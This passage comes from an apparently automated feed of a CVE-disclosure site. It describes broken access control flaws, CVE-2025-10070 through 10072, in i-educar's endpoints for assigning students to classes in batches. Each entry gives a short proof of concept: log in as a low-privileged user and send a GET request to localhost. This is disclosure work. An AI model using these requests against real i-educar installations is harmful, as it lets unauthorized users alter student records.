&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that we have access to the page and to the function to batch assign students to classes. And, this user, should not do that.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10070/image-2.png&amp;#34;
	width=&amp;#34;1556&amp;#34;
	height=&amp;#34;667&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10070/image-2_hu_9bc692092386d63c.png 480w, /p/cve-2025-10070/image-2_hu_8c43eda558b10780.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;233&amp;#34;
		data-flex-basis=&amp;#34;559px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10070.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10070.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10071</title>
        <link>https://www.cvehunters.com/p/cve-2025-10071/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10071/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10071-broken-access-control-in-cancelar-enturmacao-em-loteid-endpoint&amp;#34;&amp;gt;CVE-2025-10071: Broken Access Control in &amp;lt;code&amp;gt;/cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10071&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10071&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10071-broken-access-control-in-cancelar-enturmacao-em-loteid-endpoint&amp;#34;&amp;gt;CVE-2025-10071: Broken Access Control in &amp;lt;code&amp;gt;/cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10071&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10071&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /cancelar-enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10071/image.png&amp;#34;
	width=&amp;#34;1843&amp;#34;
	height=&amp;#34;533&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10071/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10071/image_hu_deb570b2049417e1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;829px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10071/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10071/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10071/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /cancelar-enturmacao-em-lote/15 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/enturmacao-em-lote/15
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that we have access to the page and to the function to batch unassign students from classes. And, this user, should not do that.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10071/image-2.png&amp;#34;
	width=&amp;#34;1573&amp;#34;
	height=&amp;#34;669&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10071/image-2_hu_c622a1c3b8276d3c.png 480w, /p/cve-2025-10071/image-2_hu_f4790faff4a3d16.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;235&amp;#34;
		data-flex-basis=&amp;#34;564px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10071.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10071.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10072</title>
        <link>https://www.cvehunters.com/p/cve-2025-10072/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10072/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10072-broken-access-control-in-matriculaid_studententurmarid_class-endpoint&amp;#34;&amp;gt;CVE-2025-10072: Broken Access Control in &amp;lt;code&amp;gt;/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10072&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10072&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10072-broken-access-control-in-matriculaid_studententurmarid_class-endpoint&amp;#34;&amp;gt;CVE-2025-10072: Broken Access Control in &amp;lt;code&amp;gt;/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10072&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10072&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10072/image.png&amp;#34;
	width=&amp;#34;1843&amp;#34;
	height=&amp;#34;533&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10072/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10072/image_hu_deb570b2049417e1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;829px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10072/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10072/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10072/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
